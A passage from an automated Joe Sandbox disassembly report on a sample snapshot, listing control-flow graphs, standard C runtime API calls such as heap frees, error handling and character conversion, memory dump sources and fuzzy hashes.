                                                                                                                                                                                                                                                                          control_flow_graph 230 838417-838474 GetConsoleCP 231 8385b7-8385c9 call 83123a 230->231 232 83847a-838496 230->232 233 8384b1-8384c2 call 836052 232->233 234 838498-8384af 232->234 241 8384c4-8384c7 233->241 242 8384e8-8384ea 233->242 236 8384eb-8384fa call 8372b7 234->236 236->231 246 838500-838520 WideCharToMultiByte 236->246 244 83858e-8385ad 241->244 245 8384cd-8384df call 8372b7 241->245 242->236 244->231 245->231 253 8384e5-8384e6 245->253 246->231 248 838526-83853c WriteFile 246->248 249 8385af-8385b5 GetLastError 248->249 250 83853e-83854f 248->250 249->231 250->231 252 838551-838555 250->252 254 838583-838586 252->254 255 838557-838575 WriteFile 252->255 253->246 254->232 257 83858c 254->257 255->249 256 838577-83857b 255->256 256->231 258 83857d-838580 256->258 257->231 258->254
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00838B8C,?,00000000,?,00000000,00000000), ref: 00838459
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 008384D4
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 008384EF
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00838515
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,00838B8C,00000000,?,?,?,?,?,?,?,?,?,00838B8C,?), ref: 00838534
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00838B8C,00000000,?,?,?,?,?,?,?,?,?,00838B8C,?), ref: 0083856D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5f8e833dba3ff44d36ff0f9804f692abaabfeeb7f3502aaffa53bfb87006ea9f
                                                                                                                                                                                                                                                                          • Instruction ID: 73cc0d028cac0d242b4e5fff9b0ddf7c9501c986d7afd7dd200d961a5de153d3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f8e833dba3ff44d36ff0f9804f692abaabfeeb7f3502aaffa53bfb87006ea9f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D35183B1A00249DFDB11CFA8D885AEEBBF4FF99300F14451AF555E7291DB309941CBA1

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 259 831e00-831e51 call 83ac80 call 831dc0 call 832377 266 831e53-831e65 259->266 267 831ead-831eb0 259->267 269 831ed0-831ed9 266->269 270 831e67-831e7e 266->270 268 831eb2-831ebf call 832360 267->268 267->269 274 831ec4-831ecd call 831dc0 268->274 272 831e80-831e8e call 832300 270->272 273 831e94 270->273 281 831e90 272->281 282 831ea4-831eab 272->282 276 831e97-831e9c 273->276 274->269 276->270 279 831e9e-831ea0 276->279 279->269 283 831ea2 279->283 284 831e92 281->284 285 831eda-831ee3 281->285 282->274 283->274 284->276 286 831ee5-831eec 285->286 287 831f1d-831f2d call 832340 285->287 286->287 289 831eee-831efd call 83aac0 286->289 292 831f41-831f5d call 831dc0 call 832320 287->292 293 831f2f-831f3e call 832360 287->293 297 831f1a 289->297 298 831eff-831f17 289->298 293->292 297->287 298->297
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00831E37
                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00831E3F
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00831EC8
                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00831EF3
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00831F48
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                          • Opcode ID: 865b809b69a787e24d4bba21295489ac82bae7fda2c58a2a5c9fcc4767e34bad
                                                                                                                                                                                                                                                                          • Instruction ID: 5be87391ab576bd93cf78a7ba508323e87acc18f2ab6230de1cde40a982068ff
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 865b809b69a787e24d4bba21295489ac82bae7fda2c58a2a5c9fcc4767e34bad
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5241B034A002089FCF10DF68C889A9EBBB5FF85768F148455EC15DB3A2D776AA41CBD1

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 008361DF: _free.LIBCMT ref: 00836208
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836269
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: HeapFree.KERNEL32(00000000,00000000,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?), ref: 0083487F
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: GetLastError.KERNEL32(?,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?,?), ref: 00834891
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00836274
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083627F
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008362D3
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008362DE
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008362E9
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008362F4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                                          • Instruction ID: b388512c5961e2e0732e7916343e34378041a996d3fbc5f97e70b38b0617a172
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98114271540714BAD520B779CC17FDBB79CFF80700F408825B69AE6093EAA9BA154AD2

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,008323C8,0083209F,00831AFC), ref: 008323DF
                                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008323ED
                                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00832406
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,008323C8,0083209F,00831AFC), ref: 00832458
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3bd6d0079b75d598d820bf059bdfbc0509095f1a8eb1bfee812287dcbaf814fb
                                                                                                                                                                                                                                                                          • Instruction ID: 075ca85eacb9772eaf53f968c5699070960a2084d2d7301186c9152dc3e07ef3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bd6d0079b75d598d820bf059bdfbc0509095f1a8eb1bfee812287dcbaf814fb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E901D436108B195EAA2467BCAC8A6272758FFD27B4F200339F620C11E4EF514C8192C9

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000008,?,00836D69,?,?,?,008404C8,0000002C,00833F34,00000016,0083209F,00831AFC), ref: 00834428
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083445B
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834483
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00834490
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 0083449C
                                                                                                                                                                                                                                                                          • _abort.LIBCMT ref: 008344A2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5ca604690ab11f0b7b721975792ea5569a7c315ea391c55db90765299e3b77d3
                                                                                                                                                                                                                                                                          • Instruction ID: 9f3cfa996ca4fb93873d12eb1dcde052de25f09cf9bcce31bd5c10c3692f14fd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ca604690ab11f0b7b721975792ea5569a7c315ea391c55db90765299e3b77d3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F0C835501B80A6C6167738BC1AB2B266AFFC1771F245534FA38E2191EF29A94241E6

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 390 8336fc-833724 GetModuleHandleExW 391 833726-833739 GetProcAddress 390->391 392 833749-83374d 390->392 393 83373b-833746 391->393 394 833748 391->394 395 833758-833765 call 83123a 392->395 396 83374f-833752 FreeLibrary 392->396 393->394 394->392 396->395
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008336AD,?,?,0083364D,?,008402E0,0000000C,008337A4,?,00000002), ref: 0083371C
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0083372F
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,008336AD,?,?,0083364D,?,008402E0,0000000C,008337A4,?,00000002,00000000), ref: 00833752
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                          • Opcode ID: 542fc8b0a7daac8a524a1fa1e9d3fc4ec32c7ccf6b071e48ca90125217ed6749
                                                                                                                                                                                                                                                                          • Instruction ID: ef478fc77ac22b89c1ed35983b8b807f61f37814ae21013a9e3b6a6648c418ed
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 542fc8b0a7daac8a524a1fa1e9d3fc4ec32c7ccf6b071e48ca90125217ed6749
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3F04FB0A00608BBCB159B94DC5DBAEBFB4FF88B56F004064FA05E6250DB359E44CAD0

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 400 83634d-836372 call 833f72 403 836374-83637c 400->403 404 83637f-8363a5 MultiByteToWideChar 400->404 403->404 405 836444-836448 404->405 406 8363ab-8363b7 404->406 409 836454-836469 call 83123a 405->409 410 83644a-83644d 405->410 407 836403 406->407 408 8363b9-8363ca 406->408 414 836405-836407 407->414 411 8363e5-8363eb 408->411 412 8363cc-8363db call 83ac20 408->412 410->409 418 8363ec call 8362ff 411->418 416 83643d-836443 call 83646a 412->416 426 8363dd-8363e3 412->426 415 836409-83642b call 8320b0 MultiByteToWideChar 414->415 414->416 415->416 428 83642d-83643b GetStringTypeW 415->428 416->405 423 8363f1-8363f6 418->423 423->416 427 8363f8 423->427 429 8363fe-836401 426->429 427->429 428->416 429->414
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,008354C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 0083639A
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 008363D2
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00836423
                                                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00836435
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0083643E
                                                                                                                                                                                                                                                                            • Part of subcall function 008362FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00837E5B,?,00000000,?,0083686F,?,00000004,00000000,?,?,?,00833BCD), ref: 00836331
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1857427562-0
                                                                                                                                                                                                                                                                          • Opcode ID: ff7d39f63aa062b8a0be63b80d8dea1700a63da4b4436334bf7154fb53e7d329
                                                                                                                                                                                                                                                                          • Instruction ID: 58cea69c8b8c27c87b33834b1b943ad00d90fe3a1c299451089f3af2807b8378
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff7d39f63aa062b8a0be63b80d8dea1700a63da4b4436334bf7154fb53e7d329
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E931CB72A0020AABDF259F68DC85DAE7BA5FF80710F148128FC14DA250EB35CD61CBE1

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 430 83561e-835633 GetEnvironmentStringsW 431 835635-835655 call 8355e7 WideCharToMultiByte 430->431 432 83568b 430->432 431->432 438 835657 431->438 433 83568d-83568f 432->433 435 835691-835692 FreeEnvironmentStringsW 433->435 436 835698-8356a0 433->436 435->436 439 835658 call 8362ff 438->439 440 83565d-835662 439->440 441 835680 440->441 442 835664-835678 WideCharToMultiByte 440->442 444 835682-835689 call 834869 441->444 442->441 443 83567a-83567e 442->443 443->444 444->433
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00835627
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0083564A
                                                                                                                                                                                                                                                                            • Part of subcall function 008362FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00837E5B,?,00000000,?,0083686F,?,00000004,00000000,?,?,?,00833BCD), ref: 00836331
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00835670
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00835683
                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00835692
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
• Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2278895681-0
                                                                                                                                                                                                                                                                          • Opcode ID: 203c5b36873ca12b5160134402d6d45bbaaa3cd58c30b17131357a7306e15dd4
                                                                                                                                                                                                                                                                          • Instruction ID: 28159fe34a363793a1813c8a622297cc0609ebd8b232230ea022e524fae49d41
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 203c5b36873ca12b5160134402d6d45bbaaa3cd58c30b17131357a7306e15dd4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D801F7B2601E197F67211ABA9C5EC7F6B6DFED2BA07560539F914C7100FB608C0181F0

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 447 8344a8-8344bf GetLastError 448 8344c1-8344cb call 835904 447->448 449 8344cd-8344d2 447->449 448->449 454 83451e-834525 SetLastError 448->454 451 8344d4 call 83480c 449->451 453 8344d9-8344df 451->453 455 8344e1 453->455 456 8344ea-8344f8 call 83595a 453->456 457 834527-83452c 454->457 458 8344e2-8344e8 call 834869 455->458 463 8344fa-8344fb 456->463 464 8344fd-834513 call 834296 call 834869 456->464 466 834515-83451c SetLastError 458->466 463->458 464->454 464->466 466->457
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,008347FE,00837E79,?,0083686F,?,00000004,00000000,?,?,?,00833BCD,?,00000000), ref: 008344AD
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008344E2
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00834509
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00834516
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 0083451F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                          • Opcode ID: 988ed378900d006532962738a78b64901bdacb3bff0e01d1c9202b1649fd3d4c
                                                                                                                                                                                                                                                                          • Instruction ID: 4302f6578e0a4904ff7706a435a6e3ea2ba15d9b9fa76e6dc97238c67f93e96b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 988ed378900d006532962738a78b64901bdacb3bff0e01d1c9202b1649fd3d4c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1012D76601A44A7C61277386C49F2B266DFFC1375F202434F92AD2192EF34AD4141E1

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          control_flow_graph 470 836176-836181 471 836183-83618b 470->471 472 8361dc-8361de 470->472 473 836194-83619d 471->473 474 83618d-836193 call 834869 471->474 476 8361a6-8361af 473->476 477 83619f-8361a5 call 834869 473->477 474->473 479 8361b1-8361b7 call 834869 476->479 480 8361b8-8361c1 476->480 477->476 479->480 484 8361c3-8361c9 call 834869 480->484 485 8361ca-8361d3 480->485 484->485 485->472 488 8361d5-8361db call 834869 485->488 488->472
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0083618E
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: HeapFree.KERNEL32(00000000,00000000,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?), ref: 0083487F
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: GetLastError.KERNEL32(?,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?,?), ref: 00834891
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008361A0
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008361B2
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008361C4
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 008361D6
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_830000_Scan_doc_09_16_24_1120.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: 69a66461e4e7a433051a97227f8f8031cef5779d267869b8b2ec9b41ee0457c7
                                                                                                                                                                                                                                                                          • Instruction ID: e10380c491355859b0248f170e2b77f6276a50c93d96464a182ed7aeed40652c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69a66461e4e7a433051a97227f8f8031cef5779d267869b8b2ec9b41ee0457c7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BF0C232610240BF8AA0EB1DF885C1EB7DCFAD1B10B194814F40DC3442D738FC808AE0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00833DAD
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: HeapFree.KERNEL32(00000000,00000000,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?), ref: 0083487F
                                                                                                                                                                                                                                                                            • Part of subcall function 00834869: GetLastError.KERNEL32(?,?,0083620D,?,00000000,?,00000000,?,00836234,?,00000007,?,?,0083669F,?,?), ref: 00834891
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00833DBF
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00833DD2
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00833DE3
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00833DF4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2219932713.0000000000831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219912969.0000000000830000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219949817.000000000083B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219971981.0000000000841000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2219993521.0000000000843000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
